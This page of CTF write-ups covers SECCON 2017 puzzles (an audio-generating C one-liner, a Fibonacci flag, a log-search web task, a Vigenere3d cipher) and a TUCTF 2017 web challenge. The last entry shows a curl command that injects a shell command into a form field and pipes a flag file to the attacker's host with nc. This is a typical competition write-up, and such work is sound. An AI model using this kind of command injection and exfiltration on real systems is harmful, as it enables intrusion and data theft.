Solution to SECCON 2017 putchar Music

13/12/17 — capitol

rebels

name:

putchar music

category:

programming

points:

100

Writeup

We got a one liner c program and where asked to find the movie title, after adding include lines it looked like this

#include <stdio.h>
#include <math.h>

main(t,i,j){unsigned char p[]="###<f_YM\204g_YM\204g_Y_H #<f_YM\204g_YM\204g_Y_H #+-?[WKAMYJ/7 #+-?[WKgH #+-?[WKAMYJ/7hk\206\203tk\\YJAfkkk";
for(i=0;t=1;i=(i+1)%(sizeof(p)-1)){double x=pow(1.05946309435931,p[i]/6+13);for(j=1+p[i]%6;t++%(8192/j);)
putchar(t>>5|(int)(t*x));}}

We compiled it with:

gcc putchar.c -lm

And when we can the program it produced a lot of random output in intervals, so we piped it to the sound card with:

./a.out | padsp tee /dev/audio > /dev/null

That produced beautiful music and we are thinking about converting all our mp3s to C now.

flag was SECCON{STAR_WARS}

Solution to SECCON 2017 Run Me!

12/12/17 — capitol

fibonacci

name:

Run Me!

category:

programming

points:

100

Writeup

We got a small python program that calculated a number and printed the flag.

import sys
sys.setrecursionlimit(99999)
def f(n):
    return n if n < 2 else f(n-2) + f(n-1)
print "SECCON{" + str(f(11011))[:32] + "}"

Only problem was that it was pretty slow. Looking at the function f, it became clear that it was a recursive implementation of a fibonacci number calculator.

We can simplify the program by pre-calculating the number, since the input 11011 is static. This is a good resource for doing math online. That gives us the program:

print "SECCON{" + str(650761408323317176677727615418728824035834139276098998490249192132666758545760517800054917034155243927170284032856159641073239445267259027201529090078896791094491606651280986273375358475762477790432186275595009347181655230560612893072010176744437899125794062096822499169737341076562268978822309439778493884517811269755645677051823939101818750862488649336629337157213652909313926271909722579127327516034001078889493903847162940951919936666981110589496109534874704781719109928400031417346568159901873387957504386076864598280589140560720555215586103334108606666557885182543411057646507987554088958465040914897691939542285281414546306123632401776970176802858533764858159120251846344138169520194579452006975065591700295752709436626337896977143749517364692359205470520308998499747373023079909096931930849470838600436193492730120598058390332468715098569506803288748815104425904241644846838395455904535450056833234799685571736399955768131656445051569947468596781842534517197721000873495062895837282533156293369623617362342118583768869069357254102738089664559884034222599617271201387495056590015984399482556187470258510628428546129648977633092532344658489593547730850249245718744514953339799649429008307017831938762015220771469692523759803441301822573457181350382636976785308875676049259482221646051841764952498511738390807032009076345712915067307334601511409483180854512241289677598260345859220604188459466566218428522712526307485414327912984814200699366287893779866533195964875622418194229718474283906639970274067803465246049255487228512317014925146357266424154230175016287402954010234339299976926358623916935423402962510413409907048690682619724213875769975891654986212343055742766929242325603302953851160284942626779251037312496874310855130377517889541404945838665610608950717555040757378177019719117615549280661866187332498803134726445107694994290546795927294081948416543673731399120512192375688817905543314233147723782998209741461558386215456190659067634677870007289790910629423072714321397319111715970130151174669992797276293445539760861617336440030158167771970869191088140343413881822920781894388333124029339099939263144538805634147654202831717365638267529461536461367917300661565377015525846611173849663494461429041123993952629470445363197932541803303152120627201578910609457626560492171665716942761589)[:32] + "}"

flag was SECCON{65076140832331717667772761541872}

Solution to SECCON 2017 Log Search

11/12/17 — capitol

logs

name:

Log search

category:

web

points:

100

Writeup

We go a link to an empty site with the words “Find the flag!”.

Looking at the source we found a link to another page.

That was a search page for accesses to the webpage. Searching for flag gave us this url: http://logsearch.pwn.seccon.jp/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt

flag was SECCON{N0SQL_1njection_for_Elasticsearch!}

Solution to SECCON 2017 Vigenere3d

10/12/17 — capitol

fractal

name:

Vigenere3d

category:

crypto

points:

100

Writeup

We got a python program:

import sys
def _l(idx, s):
    return s[idx:] + s[:idx]
def main(p, k1, k2):
    s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
    t = [[_l((i+j) % len(s), s) for j in range(len(s))] for i in range(len(s))]
    i1 = 0
    i2 = 0
    c = ""
    for a in p:
        c += t[s.find(a)][s.find(k1[i1])][s.find(k2[i2])]
        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)
    return c
print main(sys.argv[1], sys.argv[2], sys.argv[2][::-1])

and some example output:

$ python Vigenere3d.py SECCON{**************************} **************
POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9

Lets call the first argument “flag” and the second “seed”.

Line 2 in the main function creates a three dimensional lookup table, and as seen in the first line in the for loop, the lookups are based on flag string, the seed string and the seed string inversed.

Since we know 7 characters of the flag, we can calculate the key string like this:

    plain = "SECCON{"
    encry = "POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9"
    #print seed
    for a in range(0, 7):
        for d in range(0, len(t[s.find(plain[a])])):
            for e in range(0, len(t[s.find(plain[a])][s.find(plain[a])])):
                if t[s.find(plain[a])][d][e] == encry[a] and s[d] == 'A':
                    print "%i %c %c" % (a, s[d], s[e])

which gives us the output:

0 A _
1 A K
2 A P
3 A 2
4 A Z
5 A a
6 A _

Once we know that the seed is AAAAAAA_aZ2PK_ we can calculate the flag with:

    #print flag
    for a in range(0, len(p)):
        for d in range(0, len(s)):
            if t[d][s.find(k1[i1])][s.find(k2[i2])] == encry[a]:
                print "%i %c" % (a, s[d])

        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)

Flag was: SECCON{Welc0me_to_SECCON_CTF_2017}

Solution to TUCTF 2017 iFrame and Shame

03/12/17 — capitol

arachnid

name:

iFrame and Shame

category:

web

points:

300

Writeup

We where tired and just pointed arachni at the page and it reported that there was os command injection in the form.

Once we knew that it was just a question of getting the flag, there was some sort of limit on number of rows returned, so we just piped the flag to our server with nc.

curl 'http://iframeshame.tuctf.com/' --data 'search=" ; cat flag | nc <ip> <port> ; "&Submit=Submit+Query'

flag was TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}